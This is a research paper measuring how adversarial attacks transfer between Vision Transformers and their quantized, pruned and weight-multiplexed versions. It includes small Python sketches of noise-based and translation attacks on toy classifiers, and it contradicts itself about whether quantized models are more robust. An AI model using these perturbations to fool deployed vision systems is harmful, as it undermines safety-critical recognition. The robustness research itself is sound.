Attacking Compressed Vision Transformers
Swapnil Parekh(✉), Pratyush Shukla, and Devansh Shah
New York University, New York City, USA
[email protected]
Abstract. Vision Transformers are increasingly embedded in industrial systems due to their superior performance, but their memory and power requirements make deploying them to edge devices a challenging task. Hence, model compression techniques are now widely used to deploy models on edge devices, as they decrease the resource requirements and make model inference fast and efficient. However, their reliability and robustness from a security perspective are major issues in safety-critical applications. Adversarial attacks are like optical illusions for ML algorithms, and they can severely impact the accuracy and reliability of models. In this work, we investigate the performance of adversarial attacks across the Vision Transformer model compressed using 3 SOTA compression techniques. We also analyze the effect that different compression techniques, such as Quantization, Pruning, and Weight Multiplexing, have on the transferability of adversarial attacks.
Keywords: Adversarial attacks · Vision transformers · Model compression · Universal adversarial perturbations · Quantization · Pruning · Knowledge distillation
1 Introduction
Industrial systems require highly optimized algorithms with low latency for real-time deployment. In practice, these algorithms are often neural network models that are massive in size and require high computation power, so deploying them on edge devices becomes a challenging task [19]. Vision Transformers (ViTs) are computationally expensive models with a large memory footprint, so they have long training times on massive datasets. Model compression techniques such as quantization and pruning are now widely used to deploy such models on edge devices, as they decrease the resource requirements and make model inference fast and efficient. Additionally, knowledge distillation is being used to improve model performance and memory footprints [2]. More recently, ViTs have been attacked by several white-box and black-box attacks [3]. These adversarial attacks are like optical illusions for machines, where such samples can severely impact the accuracy and reliability of models. Hence, from a security perspective, their reliability and robustness are major issues in safety-critical applications.
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 743–758, 2023. https://doi.org/10.1007/978-3-031-28073-3_50
S. Parekh et al.
1.1 Related Work
Attacks on Vision Transformers: Several attacks have been proposed to challenge the security of Vision Transformers. One recent attack framework, Patch-Fool, proposed by Fu et al. [7], adversarially modifies certain patches in the images to fool ViTs. Subramanya et al. [15] were the first to discover vulnerabilities of ViTs using backdoor attacks and to check their susceptibility. The attack poisons a portion of the test images, which can then be used to manipulate the model’s decision by triggering these images at test time. The most comprehensive study of white-box and black-box attacks on ViTs was performed by Benz et al. [3], who compare the robustness of ViTs to that of CNNs and MLP-Mixer models.
Compressing Vision Transformers: Several compression techniques have been proposed to deal with the massive memory and computational overhead of these models. Notable work includes post-training quantization of ViT weights [10], weight pruning of ViTs [12, 18], and weight multiplexing and distillation to compress ViTs while maintaining accuracy [20].
1.2 Novel Contribution
With the recent popularity of ViT-based architectures as alternatives to CNNs, it is vital for the community to understand the adversarial robustness of ViTs and of their compressed versions. To the best of our knowledge, this paper is the first work to attack ViTs to which various compression techniques have been applied and to measure their performance. We investigate the transferability of adversarial samples across the SOTA ViT model and its compressed versions to infer the effects that different compression techniques have on adversarial attacks. We were inspired by Zhao et al. [21], who perform an exhaustive study of white-box and black-box attacks on CNNs, and we replicate that study for ViTs and their SOTA compressed variants. In the rest of the paper, we introduce the compression techniques and the different types of attacks that we perform on these compressed ViT models. Further along, in Sect. 7, we present the results using graphs to show the effect of every attack on a particular type of model compression compared with the original. We make interesting observations about the vulnerability of quantized ViTs to black-box attacks, the effect of pruning sparsity on ViT resilience against universal perturbations, and attack transferability across various compression techniques. We show that these attacks remain highly transferable across the original and compressed versions and can cause millions in damages if exploited.
2 Dataset
The ImageNet [5] dataset contains 14,197,122 WordNet-annotated images. The dataset has been used in the ImageNet Large Scale Visual Recognition Challenge
(ILSVRC), an image classification and object identification benchmark, since 2010. The publicly available dataset includes a set of manually annotated training images. A set of test images is also available, although without the manual annotations. There are two types of ILSVRC annotations: (1) image-level annotations that include a binary label for the presence or absence of an object class in the image, such as “there are cars in this image” but “there are no tigers,” and (2) object-level annotations that include a tight bounding box and class label around an object instance in the image. We use the image classification dataset, described as follows:
– Images from 1000 different classes are included in the dataset.
– It is divided into three sections: training (1.3 million images), validation (50,000 images), and testing (100,000 images with held-out class labels).
– There are around 14M images in total.
3 Metrics
We use 3 metrics to quantify attack performance and model compression performance:
1. ASR (Attack Success Rate): the fraction of attacks on a dataset that succeed in making the model misclassify.
2. FLOPs and throughput (images/s), used to benchmark compressed model performance.
3. Model size (in MB), used to measure the memory reduction of the compressed model.
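As a minimal sketch of the first metric, the attack success rate can be computed from the model's predictions on clean and adversarial inputs. The function name `attack_success_rate` and the example predictions are hypothetical, and the convention of counting only samples that were classified correctly before the attack is an assumption; the paper does not state which convention it uses.

```python
def attack_success_rate(labels, clean_preds, adv_preds):
    """Fraction of originally correct samples whose prediction the attack flips.

    Assumption (not stated in the paper): samples that the model already
    misclassifies before the attack are excluded from the denominator.
    """
    attacked = 0  # samples the model classified correctly before the attack
    fooled = 0    # of those, samples misclassified after the attack
    for label, clean, adv in zip(labels, clean_preds, adv_preds):
        if clean != label:
            continue
        attacked += 1
        if adv != label:
            fooled += 1
    return fooled / attacked if attacked else 0.0


# Hypothetical predictions for five images.
labels = [3, 1, 4, 1, 5]
clean_preds = [3, 1, 4, 0, 5]  # the fourth image is misclassified even without an attack
adv_preds = [3, 2, 0, 0, 5]    # the attack flips the second and third images
print(f"ASR = {attack_success_rate(labels, clean_preds, adv_preds):.2f}")  # ASR = 0.50
```

Excluding already-misclassified samples keeps the metric from crediting the attack with errors the model makes on its own; dividing by the full dataset size instead is an equally common convention.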
4 Vision Transformers and Types
4.1 Transformers
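As a concrete reference point for the attention mechanism that this subsection describes, the sketch below implements scaled dot-product attention, the formulation used in [17], on plain nested lists. It is illustrative only: the function names are hypothetical, and the learned projection matrices, multiple heads, and batching used by real Transformers are omitted.

```python
import math


def softmax(scores):
    """Numerically stable softmax over a list of floats."""
    peak = max(scores)
    exps = [math.exp(s - peak) for s in scores]
    total = sum(exps)
    return [e / total for e in exps]


def scaled_dot_product_attention(queries, keys, values):
    """For each query, return a weighted average of the value vectors.

    The weights come from the softmax of the query-key dot products,
    scaled by sqrt(d_k) where d_k is the key dimension.
    """
    d_k = len(keys[0])
    outputs = []
    for q in queries:
        scores = [sum(qi * ki for qi, ki in zip(q, k)) / math.sqrt(d_k) for k in keys]
        weights = softmax(scores)  # how strongly this query attends to each position
        outputs.append([
            sum(w * v[j] for w, v in zip(weights, values))
            for j in range(len(values[0]))
        ])
    return outputs


# Self-attention over three toy token embeddings (illustrative values).
tokens = [[1.0, 0.0], [0.0, 1.0], [1.0, 1.0]]
for row in scaled_dot_product_attention(tokens, tokens, tokens):
    print([round(x, 3) for x in row])
```

Every output row depends on all input positions at once, which is what lets a Transformer process the whole sequence in parallel rather than step by step.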
Vision Transformers are based on Transformers [17], an attention-based sequence transduction neural network model that learns context and meaning by tracking relationships in sequential data such as text. The attention mechanism allows the model to make predictions by analyzing the entire input while selectively attending to some parts. Transformers apply this mechanism using an encoder-decoder structure. Unlike recurrent neural networks (LSTMs, for example), Transformers read all the words in the text at once, thus parallelizing the process. This makes Transformers easy to train on a large corpus.
4.2 Vision Transformers
While the Transformer architecture has emerged as the de facto standard for natural language processing tasks, its applications to computer vision remain
limited. Attention is used in vision either in conjunction with convolutional networks or to replace specific components of convolutional networks while maintaining their overall structure. The work in [6] demonstrates that relying on CNNs is not required and that a pure transformer applied directly to sequences of image patches can perform very well on image classification tasks. The Vision Transformer (ViT) achieves excellent results compared to state-of-the-art convolutional networks when pre-trained on large amounts of data and transferred to multiple mid-sized or small image recognition benchmarks (ImageNet, CIFAR-100, VTAB, etc.).
4.3 Data-Efficient Image Transformers (DeiT)
DeiT presents a transformer-specific teacher-student strategy [16]. It is based on a distillation token that ensures the student learns from the teacher through attention. This token-based distillation is gaining popularity, especially when a convnet is used as the teacher. The results are competitive with convnets both on ImageNet (85.2% accuracy achieved) and when transferring to other tasks. The first essential component of DeiT is its training strategy. Initially, the authors used data augmentation, optimization, and regularization to simulate CNN training on a much larger data set. They also altered the Transformer architecture to allow for native distillation. (Distillation is the process by which one neural network, the student, learns from the output of another, the teacher.) A CNN is used as the teacher model for the Transformer. The use of distillation may impair neural network performance, because the student model learns from two sources that may diverge: a labeled data set (strong supervision) and the teacher. To address this, a distillation token is introduced: a learned vector that flows through the network along with the transformed image data, cueing the model for its distillation output, which can differ from its class output. This enhanced distillation method is unique to Transformers.
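The two training signals described above can be sketched as a loss with two cross-entropy terms, one per output head. The sketch follows the hard-label distillation variant from the DeiT paper [16]; whether the models in this work were trained with that exact variant is an assumption, and the function and argument names are hypothetical.

```python
import math


def cross_entropy(logits, target):
    """Cross-entropy of softmax(logits) against an integer class index."""
    peak = max(logits)
    log_sum_exp = peak + math.log(sum(math.exp(z - peak) for z in logits))
    return log_sum_exp - logits[target]


def hard_distillation_loss(class_logits, dist_logits, teacher_logits, label):
    """Average of two objectives that may pull in different directions.

    class_logits: student output read from the class token
    dist_logits: student output read from the distillation token
    teacher_logits: output of the (frozen) teacher, e.g. a CNN
    label: ground-truth class index
    """
    # The teacher's hard decision serves as the target for the distillation head.
    teacher_label = max(range(len(teacher_logits)), key=lambda i: teacher_logits[i])
    supervised = cross_entropy(class_logits, label)
    distilled = cross_entropy(dist_logits, teacher_label)
    return 0.5 * supervised + 0.5 * distilled


# Illustrative case where the teacher (class 1) disagrees with the label (class 0).
loss = hard_distillation_loss(
    class_logits=[2.0, 0.5, -1.0],
    dist_logits=[0.5, 2.0, -1.0],
    teacher_logits=[0.1, 3.0, 0.2],
    label=0,
)
print(round(loss, 4))
```

Giving each objective its own token and head lets the two heads disagree when the teacher and the label diverge, instead of forcing a single output to satisfy both.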
5 Attacks
Depending on the level of access to the target model, adversarial attacks can be divided into white-box attacks, which require full access to the target model, and query-based black-box attacks. Adversarial attacks can also be divided into image-dependent attacks and universal attacks. In contrast to image-dependent attacks, a universal attack uses a single perturbation, the universal adversarial perturbation (UAP), that fools the model on most images.
5.1 White Box Attacks
In White Box attack [3], the adversary has full access and knowledge of the model, that is, the architecture of the model, its parameters, gradients, and loss with respect to the input as well as possible defense mechanisms known to the
attacker. It is thus not particularly difficult to attack models under this condition. Common methods that exploit the model’s gradients to generate adversarial examples include the Fast Gradient Sign Method (FGSM), the Fast Gradient Method (FGM), the iterative version of FGSM (I-FGSM), the Momentum Iterative gradient-based method (MI-FGSM), Projected Gradient Descent (PGD), and DeepFool, an iterative algorithm. We use Universal Adversarial Perturbations (UAP) to attack our models.
Universal Adversarial Perturbations (UAP): The goal of UAP is to identify a single small image perturbation that deceives a state-of-the-art deep neural network classifier on all natural images. Moosavi-Dezfooli et al. [11] demonstrate the existence of such quasi-imperceptible universal perturbation vectors, which cause images to be misclassified with high probability. That is, adding such a quasi-imperceptible perturbation to natural images changes the label estimated by the deep neural network with high probability. Because they are image-agnostic and work on any input, such perturbations are called universal. Additionally, recent work has shown that generating these triggers does not require access to any training data [14]. An example of a UAP is shown in Fig. 3. The authors propose the following formulation for estimating such perturbations. Let $\mu$ denote a distribution of images in $\mathbb{R}^d$, and let $\hat{k}$ be a classification function that outputs an estimated label $\hat{k}(x)$ for each image $x \in \mathbb{R}^d$. The main focus of their paper is to seek perturbation vectors $v \in \mathbb{R}^d$ that fool the classifier $\hat{k}$ on almost all data points sampled from $\mu$. They seek a vector $v$ such that $\hat{k}(x + v) \neq \hat{k}(x)$ for “most” $x \sim \mu$.
5.2 Black Box Attacks
In contrast to white-box attacks, a black-box attack [4] has limited knowledge of the model. Querying the model on inputs and observing the labels or confidence scores is a common paradigm for an attack under black-box constraints. While black-box attacks restrict the attacker’s capabilities, they are more realistic in real-world scenarios. Security attacks are often carried out on fully developed and deployed systems. In the real world, attacks with the goal of circumventing, disabling, or compromising integrity are common. This paradigm allows for the consideration of two parties: adversary and challenger. The challenger is the party that trains and deploys a model, whereas the adversary is the party that attempts to break the system for a predetermined aim. This setting allows for a variety of capability settings that mimic real-world behavior. Some examples of black-box attacks are Query Reduction using Finite Differences, Translation-Invariant, Spatial Attack, L2 Contrast Reduction Attack, Salt And Pepper Noise Attack, and Linear Search Blended Uniform Noise Attack. We describe the attacks used in our work below.
Spatial Attack: One important criterion for adversarial examples is that the perturbed images should “look similar to” the original instances. All the existing
approaches directly modify pixel values, which may sometimes produce noticeable artifacts. Instead, Spatial Attack [13] aims to smoothly change the geometry of the scene while keeping the original appearance, producing more perceptually realistic adversarial examples. In this attack, the idea is to use rotations and translations in an adversarial manner. The attack used the following hyperparameters: do-rotations (If False no rotations will be applied to the image), do-translations (If False no translations will be applied to the image).
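To make the idea concrete, the sketch below implements only the translation half of such an attack as a grid search that needs nothing but label queries to the model. It is a simplified illustration under stated assumptions, not the implementation used in the paper: images are 2D lists of pixel values, `predict` is a hypothetical callable returning a class label, rotations are omitted, and the search order (smallest shifts first) is a design choice made here.

```python
def translate(image, dx, dy, fill=0.0):
    """Shift a 2D image (list of rows) by dx columns and dy rows, padding with fill."""
    height, width = len(image), len(image[0])
    shifted = [[fill] * width for _ in range(height)]
    for y in range(height):
        for x in range(width):
            src_y, src_x = y - dy, x - dx
            if 0 <= src_y < height and 0 <= src_x < width:
                shifted[y][x] = image[src_y][src_x]
    return shifted


def translation_attack(predict, image, label, max_shift=2):
    """Return (dx, dy, shifted_image) for the first shift that changes the label.

    Shifts are tried in order of increasing size so that the smallest
    geometric change is preferred. Returns None if no shift succeeds.
    """
    shifts = sorted(
        ((dx, dy)
         for dx in range(-max_shift, max_shift + 1)
         for dy in range(-max_shift, max_shift + 1)),
        key=lambda s: abs(s[0]) + abs(s[1]),
    )
    for dx, dy in shifts:
        candidate = translate(image, dx, dy)
        if predict(candidate) != label:  # the only access to the model is this query
            return dx, dy, candidate
    return None


# Toy stand-in for a classifier: class 1 if the top-left pixel is bright.
def toy_predict(img):
    return 1 if img[0][0] > 0.5 else 0


toy_image = [[1.0, 0.0, 0.0],
             [0.0, 0.0, 0.0],
             [0.0, 0.0, 0.0]]
result = translation_attack(toy_predict, toy_image, label=1)
print(result[:2] if result else "no adversarial shift found")
```

Because the search only compares predicted labels, it fits the black-box setting; a rotation search would follow the same pattern with an additional angle loop.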
Fig. 1. Salt and pepper noise effects.
Salt and Pepper Noise Attack: Salt-and-pepper noise, also known as impulse noise, is a form of noise sometimes seen on digital images. This noise can be caused by sharp and sudden disturbances in the image signal. It presents itself as sparsely occurring white and black pixels. The results of adding this kind of noise can be observed in Fig. 1. An effective noise reduction method for this type of noise is a median filter or a morphological filter. This adversarial attack [13] aims to increase the amount of salt and pepper noise until the input is misclassified. The attack used the following hyperparameters: steps (The number of steps to run).
Linear Search Blended Uniform Noise Attack: Linear Search Blended Uniform Noise Attack [13] aims to blend the input with a uniform noise input until it is misclassified.
Attacking Compressed Vision Transformers
Fig. 2. Pruning example for imagenet.
Fig. 3. UAP example.
The attack used the following hyperparameters: distance (Distance measure for which minimal adversarial examples are searched), directions (Number of random directions in which the perturbation is searched), steps (Number of blending steps between the original image and the random directions).
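Both noise-based attacks described above follow the same pattern: increase the perturbation step by step and stop at the first misclassified candidate. The sketch below is a simplified illustration in plain Python, not the Foolbox code; images are flat lists of values in [0, 1], and the function names, default values, and the toy classifier are assumptions made for the example.

```python
import random

def salt_and_pepper_attack(image, label, predict, steps=100, seed=0):
    """Set a growing fraction of pixels to 0 (pepper) or 1 (salt) until the label flips."""
    rng = random.Random(seed)
    n = len(image)
    for step in range(1, steps + 1):
        fraction = step / steps
        candidate = list(image)
        for i in rng.sample(range(n), int(round(fraction * n))):
            candidate[i] = rng.choice((0.0, 1.0))
        if predict(candidate) != label:
            return candidate, fraction
    return None, None

def blended_uniform_noise_attack(image, label, predict, directions=10, steps=100, seed=0):
    """Blend the image with uniform noise, searching linearly over the blend weight."""
    rng = random.Random(seed)
    for _ in range(directions):
        noise = [rng.random() for _ in image]
        if predict(noise) == label:
            continue  # this noise image is not adversarial on its own; draw another
        for step in range(1, steps + 1):
            eps = step / steps
            candidate = [(1 - eps) * x + eps * z for x, z in zip(image, noise)]
            if predict(candidate) != label:
                return candidate, eps
    return None, None

def toy_predict(image):
    """Hypothetical classifier: class 1 when most pixels are light gray (0.8 < v < 0.95)."""
    light_gray = sum(1 for v in image if 0.8 < v < 0.95)
    return 1 if light_gray > len(image) / 2 else 0

clean = [0.9] * 100
sp_adv, sp_fraction = salt_and_pepper_attack(clean, 1, toy_predict)
bl_adv, bl_eps = blended_uniform_noise_attack(clean, 1, toy_predict)
```

In both functions the returned fraction or blend weight is the smallest value on the search grid that fooled the classifier, which is why a finer `steps` setting yields a less visible perturbation at the cost of more model queries.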
6 Compression Techniques
6.1 Dynamic Quantization
When developing neural networks, there are several trade-offs to consider. During model building and training, the number of layers and parameters (for example, in a recurrent neural network) can be changed to trade off accuracy against model size and/or model latency or throughput. Because each change requires iterating over model training, such adjustments can take a long time and a lot of computing resources. After training, quantization [1] can be used to make a similar trade-off between performance and model accuracy on an already trained model. Quantizing a network entails converting the weights and/or activations to a lower-precision integer representation. This reduces model size and allows the CPU or GPU to perform higher-throughput arithmetic operations. Converting from floating-point to integer numbers entails multiplying the floating-point value by a scaling factor and rounding the result to the nearest whole number. The various quantization methods differ in how they obtain that scale factor. In dynamic quantization, the scale factor for activations is determined at runtime from the observed data range. Because dynamic quantization has few tuning options, it is well suited for inclusion in production pipelines as a standard step in converting models for deployment. Model parameters, on the other hand, are known during model conversion and are converted and saved in INT8 format ahead of time. The quantized model uses vectorized INT8 instructions for arithmetic. To avoid overflow, accumulation is usually done in INT16 or INT32. The higher-precision result is then scaled back to INT8 if the following layer is quantized, or converted to FP32 for output.
6.2 Pruning: Dynamic DeiT
In ViTs, attention is sparse and the final prediction is based on only a subset of the most informative tokens, which is sufficient for accurate image recognition. Based on this observation, the authors of [12] propose a dynamic token sparsification framework for progressively and dynamically pruning redundant tokens based on the input. A lightweight prediction module estimates the importance score of each token based on the current features. This module is added to different layers to prune redundant tokens hierarchically. The authors propose an attention masking strategy that differentiably prunes a token by blocking its interactions with other tokens, so that the prediction module can be optimized end to end. Because of the nature of self-attention, unstructured sparse tokens are still hardware friendly, making it easy for this framework to achieve actual speed-up.
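As a rough illustration of hierarchical token pruning at inference time, the sketch below keeps the highest-scoring fraction of tokens at each pruning stage. It is not the method of [12]: the learned prediction module is replaced by an arbitrary hypothetical `score_fn`, the attention-masking training procedure is omitted, and the choices of three stages and 196 input tokens are assumptions made for the example.

```python
def prune_tokens(tokens, scores, keep_ratio):
    """Keep the highest-scoring fraction of tokens, preserving their original order."""
    keep = max(1, int(len(tokens) * keep_ratio))
    top = sorted(range(len(tokens)), key=lambda i: scores[i], reverse=True)[:keep]
    return [tokens[i] for i in sorted(top)]

def hierarchical_prune(tokens, score_fn, keep_ratio, stages=3):
    """Apply the same keep ratio at several stages; return survivors and token counts."""
    counts = [len(tokens)]
    for _ in range(stages):
        scores = [score_fn(t) for t in tokens]
        tokens = prune_tokens(tokens, scores, keep_ratio)
        counts.append(len(tokens))
    return tokens, counts

# Tokens are represented by integer ids; the score function is a placeholder.
tokens = list(range(196))
kept, counts = hierarchical_prune(tokens, score_fn=lambda t: t % 7, keep_ratio=0.7)
```

Under these assumptions a keep ratio of 0.7 applied three times leaves 66 of 196 tokens, roughly a third of the input, which is of the same order as pruning about two thirds of the tokens overall.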
By pruning 66% of the input tokens hierarchically, the framework reduces FLOPs by 31% to 37% and improves throughput by more than 40% while keeping the accuracy drop within 0.5% for various vision transformers. An example is displayed in Fig. 2. DynamicDeiT [12] models, when equipped with the dynamic token sparsification framework, can achieve very competitive complexity/accuracy trade-offs compared to state-of-the-art CNNs and vision transformers on ImageNet. We trained three Dynamic DeiT models pruned at three different pruning probabilities: 0.5, 0.6, and 0.7.
6.3 Weight Multiplexing + Distillation: Mini-DeiT
ViT models contain a large set of parameters, restricting their applicability on low-memory devices. To alleviate this problem, the authors propose Mini-DeiT [20], a new compression framework that reduces the number of parameters in vision transformers while retaining the same performance. The central idea of Mini-DeiT is to multiplex the weights of consecutive transformer blocks. More specifically, the authors share the weights across layers while imposing a transformation on the weights to increase diversity. Weight distillation over self-attention is also applied to transfer knowledge from large-scale ViT models to weight-multiplexed compact models.
Weight Multiplexing: Weight multiplexing [20] combines multi-layer weights into a single weight over a shared part while using transformation and distillation to increase parameter diversity. More concretely, as shown in Fig. 5, the weight multiplexing method consists of sharing weights across multiple transformer blocks, which can be considered the combination step in multiplexing; introducing transformations in each layer to mimic demultiplexing; and applying knowledge distillation to increase the similarity of feature representations between the models before and after compression.
Weight Distillation: To compress the large pre-trained models and address the performance degradation induced by weight sharing, weight distillation [20] is used to transfer knowledge from the large models to the small, compact models. Three types of distillation are used for transformer blocks: prediction-logit distillation [8], self-attention distillation [9], and hidden-state distillation.
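The weight-sharing idea can be illustrated with a toy stack of linear layers that reuse one weight matrix and differ only in a small per-layer transformation. This is a sketch under simplifying assumptions, not the architecture of [20]: the per-layer scale vector is a hypothetical stand-in for the transformations used there, distillation is omitted, and the width 384 and depth 12 in the parameter count are illustrative values.

```python
def matvec(matrix, vector):
    """Multiply a matrix (list of rows) by a vector."""
    return [sum(m * v for m, v in zip(row, vector)) for row in matrix]

class MultiplexedStack:
    """Layers that share one weight matrix but each apply their own input scaling."""

    def __init__(self, shared_weight, layer_scales):
        self.shared_weight = shared_weight   # one d x d matrix reused by every layer
        self.layer_scales = layer_scales     # one length-d vector per layer

    def forward(self, x):
        for scale in self.layer_scales:
            x = [s * v for s, v in zip(scale, x)]   # layer-specific transformation
            x = matvec(self.shared_weight, x)       # shared (multiplexed) weights
        return x

def unshared_params(d, layers):
    """Parameter count when every layer owns its own d x d matrix."""
    return layers * d * d

def multiplexed_params(d, layers):
    """Parameter count with one shared matrix plus a length-d vector per layer."""
    return d * d + layers * d

stack = MultiplexedStack([[1, 1], [0, 1]], [[1, 1], [2, 0.5]])
output = stack.forward([1, 2])
```

The point of the count functions is that the shared matrix dominates the total, so adding layers costs only the small per-layer transformation rather than a full new weight matrix.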
7 Experiments and Results
Our experiments create attacks in two ways:
1. Create attacks on the original model and test them on a compressed model.
2. Create attacks on the compressed model and test them on the original model.
Fig. 4. Accuracies of various architectures we used on the ImageNet validation set.
Figure 4 shows the accuracies of our four model families on the ImageNet validation set. The four families are pruned DeiT, original DeiT, distilled DeiT, and Mini-DeiT (which performs weight multiplexing + distillation). We make the following observations:
1. Pruned models: as the keep rate increases and sparsity decreases, the accuracy increases and approaches that of the original DeiT-Small.
2. Quantized models have slightly lower accuracy than DeiT-Small.
3. Accuracy follows Tiny < Small < Base for the original, distilled, and Mini-DeiT models.
7.1 Compression Results
As mentioned in Sects. 6.1, 6.2, and 6.3, we use quantization, pruning, distillation (born-again networks), and weight multiplexing + distillation to compress our models. Model sizes for the various distilled and quantized models are shown in Table 1. We can observe that born-again networks are slightly bigger than the original model, while the Mini-DeiT size is proportional to the size of the original, with a marginal drop in accuracy according to Fig. 4. For the
Fig. 5. Weight multiplexing method.
base model in particular, Mini-DeiT compresses DeiT-B from 86M to 9M (9.7×). Quantization gives the biggest model size reduction, but by doing this we lose access to gradients, forcing us to rely on the less effective black-box attacks discussed in Sect. 7.2. For the pruned models, Table 2 shows how FLOPS and throughput vary as the keep probability decreases and sparsity increases. While pruning does not decrease the model size, it improves throughput and FLOPS, which helps speed up inference.
Table 1. Model weight size for distillation + quantization
         Main    Distilled    Mini-deit    8bit Quantization
Tiny     22M     23M          12M          6.4M
Small    85M     86M          44M          23M
Base     331M    334M         169M         89M
7.2 Quantization Attack Results
Quantized models do not have the ability to “pass gradients” through them in PyTorch. Hence we cannot use white-box attacks on them, since these require access to model weights and gradients. We use the three black-box attacks discussed in Sect. 5.2, and their attack success rates (ASR) are reported in Fig. 6. Key takeaways:
1. ViTs are secure against Spatial Attacks.
2. Quantized models are more vulnerable to attacks than the original model.
3. Attacks transferred from quantized models to the original model work better than vice versa. We hypothesize that this is because the 8-bit quantized model is more robust, so attacks created on it are stronger and still work on the original model (which is in the same feature space).
Table 2. Model compression performance for pruning models (DynamicDeiT) with different keep probability
Metric                Main (1.0)    pruned 0.7    pruned 0.6    pruned 0.5
GFLOPS                4.6           2.9           2.4           1.9
Throughput (img/s)    1337.7        2062.1        2274.09       2526.93
Fig. 6. Results on attacking quantized models: the scores in each cell are the ASR of spatial attack— salt and pepper attack— linear search blended uniform noise attack
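To make the quantized setting of Sect. 6.1 concrete, the sketch below shows the scale-and-round conversion to INT8 and an integer-accumulated dot product, with the activation scale chosen at run time. It is a minimal illustration in plain Python under assumed symmetric scaling, not PyTorch's implementation; the function names are hypothetical. Python integers do not overflow, so the INT16/INT32 accumulator is only noted in a comment.

```python
def quantize(values, num_bits=8):
    """Symmetric quantization: multiply by a scale factor and round to integers."""
    qmax = 2 ** (num_bits - 1) - 1                 # 127 for INT8
    max_abs = max(abs(v) for v in values) or 1.0   # avoid division by zero
    factor = qmax / max_abs
    quantized = [max(-qmax, min(qmax, round(v * factor))) for v in values]
    return quantized, factor

def quantized_dot(q_weights, w_factor, activations):
    """Dot product with pre-quantized weights and activations quantized on the fly."""
    q_acts, a_factor = quantize(activations)       # scale picked at run time ("dynamic")
    # Integer accumulation; real kernels use an INT16/INT32 accumulator here.
    acc = sum(w * a for w, a in zip(q_weights, q_acts))
    return acc / (w_factor * a_factor)             # scale back to floating point

weights = [0.5, -1.0, 0.25]
q_weights, w_factor = quantize(weights)            # done once, ahead of time
approx = quantized_dot(q_weights, w_factor, [2.0, 1.0, -4.0])
exact = sum(w * a for w, a in zip(weights, [2.0, 1.0, -4.0]))
```

One intuition for the missing gradients is that rounding is piecewise constant, so its derivative is zero almost everywhere; this is offered as background rather than as a description of PyTorch internals.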
7.3 Pruning Attack Results
We train three models with varying sparsity and pruning ratios, and transfer white-box attacks to the original model; the results are shown in Fig. 7. Key takeaways:
1. Pruned models are more sensitive to attacks than the original model.
2. The attacks remain highly transferable from the main model to the pruned models, and the transferability decreases as the keep probability decreases. This is because increasing sparsity distorts the model structure, so the attacks do not transfer as well.
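The transfer protocol used throughout these experiments (craft adversarial examples on one model, then score them on another) can be sketched as follows. This is a toy illustration with hypothetical names: the two "models" are scalar threshold classifiers, the attack is a fixed-size step toward the decision boundary, and ASR is taken here to mean the fraction of adversarial inputs that are misclassified, which is an assumption about the exact definition.

```python
def attack_success_rate(predict, adversarial_inputs, true_labels):
    """Fraction of adversarial inputs that the model misclassifies."""
    fooled = sum(1 for x, y in zip(adversarial_inputs, true_labels) if predict(x) != y)
    return fooled / len(true_labels)

def transfer_report(source_model, target_model, attack, inputs, labels):
    """Craft adversarial examples on source_model, then score them on both models."""
    adversarial = [attack(source_model, x, y) for x, y in zip(inputs, labels)]
    return {
        "source_asr": attack_success_rate(source_model, adversarial, labels),
        "transfer_asr": attack_success_rate(target_model, adversarial, labels),
    }

# Hypothetical stand-ins for an original and a compressed model.
def original(x):
    return 1 if x > 0.5 else 0

def compressed(x):
    return 1 if x > 0.4 else 0

def step_attack(model, x, y, eps=0.2):
    """Toy attack: move the input a fixed step away from its true class."""
    return x - eps if y == 1 else x + eps

report = transfer_report(original, compressed, step_attack,
                         inputs=[0.6, 0.9, 0.3, 0.1], labels=[1, 1, 0, 0])
```

Swapping the `source_model` and `target_model` arguments gives the reverse direction, so the same helper covers both attack settings listed at the start of Sect. 7.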
Fig. 7. Pruning results.
7.4 Weight Multiplexing + Distillation Attack Results
We use two types of distillation to see the effect that each individual component has on the attacks and their transferability for the three model variants: tiny, small, and base. Key takeaways according to Figs. 8, 9, and 10:
Fig. 8. Base distillation results.
Fig. 9. Tiny distillation results.
Fig. 10. Small distillation results.
1. The weight-multiplexed models are more robust to attacks than the distilled and original models in all variants.
2. Attacks transfer very well from the original model to both distilled models, probably because the distilled models depend heavily on the probabilities of the teacher (the original model), which are used to compute the attacks in the black-box setting.
3. Base models are more robust than the Tiny and Small model variants.
4. Attacks created on the weight-multiplexed models work better on the original model than attacks created on purely distilled models, likely because the robustness of the weight-multiplexed models leads to stronger attacks.
8 Limitations and Future Work
Since our aim is to test the underlying transformer architecture and how its robustness changes when compressed, we only test the adversarial robustness of vanilla vision transformer models such as DeiT trained on the ImageNet dataset. We do not apply any robustness-improving training techniques such as data augmentation, early stopping, or adversarial retraining. We leave this analysis to future work. Additional future research directions include interpreting the predictions of the various compressed models and identifying why some compressed models are more vulnerable to attacks, using interpretability tools such as Integrated Gradients. Ultimately, we as researchers should aim to develop effective compression techniques that reduce model size while also providing robust models, to allow widespread deployment of ViTs.
9 Conclusion
In this work, we train various ViTs and apply state-of-the-art compression techniques to them to evaluate their robustness in an adversarial setting. We discover several interesting facts: high pruning sparsity reduces the effectiveness of adversarial attacks; compressed models, especially quantized models, are more vulnerable to black-box attacks; and weight-multiplexed models are more robust to attacks than the others. Additionally, we provide an experimentation framework for applying various compression techniques and adversarial attacks to various ViT architectures, which is easily extensible to new compression techniques and ViT variants. Ultimately, while compressed models may provide performance benefits, they do not provide much in the way of security. Attacks created on a compressed model deployed on an edge device can be transferred to other underlying models, and can wreak havoc and cost companies millions if not dealt with promptly. Our code is available here: https://github.com/SwapnilDreams100/Attacking Compressed ViTs
Acknowledgments. We would like to thank Prof. Siddharth Garg at NYU Tandon School of Engineering for his advice and support for this paper. This work was supported in part through the NYU IT High-Performance Computing resources, services, and staff expertise.
References
1. Dynamic quantization
2. Knowledge distillation on cifar10
3. Benz, P., Ham, S., Zhang, C., Karjauv, A., Kweon, I.S.: Adversarial robustness comparison of vision transformer and mlp-mixer to cnns. CoRR, abs/2110.02797 (2021)
4. Bhambri, S., Muku, S., Tulasi, A., Buduru, A.B.: A study of black box adversarial attacks in computer vision. CoRR, abs/1912.01667 (2019)
5. Deng, J., Dong, W., Socher, R., Li, L.J., Li, K., Fei-Fei, L.: Imagenet: a large-scale hierarchical image database. In: 2009 IEEE Conference on Computer Vision and Pattern Recognition, pp. 248–255 (2009)
6. Dosovitskiy, A., et al.: An image is worth 16×16 words: transformers for image recognition at scale. CoRR, abs/2010.11929 (2020)
